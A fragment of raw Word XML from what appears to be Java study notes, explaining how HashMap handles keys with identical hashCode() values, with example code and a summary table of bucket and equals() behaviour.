    <w:p w14:paraId="32B88B6F"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6CCA026E"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCE251" w14:textId="10B4783F"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HashMapCollisionExampl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7DE336F5"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stat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main</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String</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arg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10C046AC"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyKey</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Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> map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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63FD17"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F13593"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MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key1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MyKey</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A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0F031"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MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key2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MyKey</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B"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B4C95"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MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key3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MyKey</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C"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625E698"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170C0F5E"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map</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key1</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12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B63AD3"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map</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key2</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12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB9AE7"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map</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key3</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18</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872591F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1E5DC"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Value for A: "</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map</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ge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key1</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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BFC77"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Value for B: "</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map</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ge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key2</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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C14F60"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Value for C: "</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map</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ge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key3</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18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680EF029" w14:textId="7777777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12B859E8" w14:textId="4FF7DB27" w:rsidR="00531D55" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB58454" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="0049206B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FA2A77" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D55">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What's Happening Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C0D2B" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D5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hCode() is overridden to return 100 for all keys → all keys go to same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D200DD" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D5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ut equals() compares key string, so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77FAC0" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D5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equals("B") → false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDB50C5" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D5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quals("C") → false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6782C" w14:textId="77777777" w:rsidR="00531D55" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="00531D5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nce, all keys are treated as distinct entries in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEFF9A" w14:textId="6ADCB1E6" w:rsidR="00324AE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00531D55">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="35C53DB2">
          <v:rect id="_x0000_i1532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C871F" w14:textId="3585D325" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00BC674E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc196307652"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What if equals() returns true for two keys with same hashCode()</w:t>
      </w:r>
      <w:r w:rsidR="00127D9B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="5C28A7B2" w14:textId="07AF5B45" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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n it replaces the old value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34420265" w14:textId="77777777" w:rsidR="00DB7EDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB7EDC" w:rsidP="00DB7EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4491551B" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> k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Key</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167ACC92" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> k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Key</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ame content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006B5C4" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77C093" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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k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00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39238CDD" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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k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0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ame key (based on equals), replaces value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFCA03" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBE2C2" w14:textId="23BF4959" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00A220F2">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378760"/>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k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200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C3070" w14:textId="77777777" w:rsidR="005867E7" w:rsidRPr="00CE4B95" w:rsidRDefault="005867E7" w:rsidP="00DB7EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1352DAD7" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔚</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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3"/>
        <w:gridCol w:w="5331"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="63AD2745" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA220BA" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22CE695F" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="4E37BE04" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C86008" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Same hashCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1618BDD8" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Goes to same bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="5BFFCAA4" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B818248" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Different equals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="426FF466" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Stored as different keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="4535B049" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0DCA65" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Same equals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F1A7635" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Treated as same key, old value replaced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w14:paraId="57BA5C89" w14:textId="77777777" w:rsidTr="00CE6FA6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37B8C2FA" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Internal DS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="461CBE39" w14:textId="77777777" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE6FA6" w:rsidP="00CE6FA6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Array + Linked List / Tree (Java 8+) to handle collisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D5B54AF" w14:textId="76BF2816" w:rsidR="00CE6FA6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00DB7ED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CADE88C">
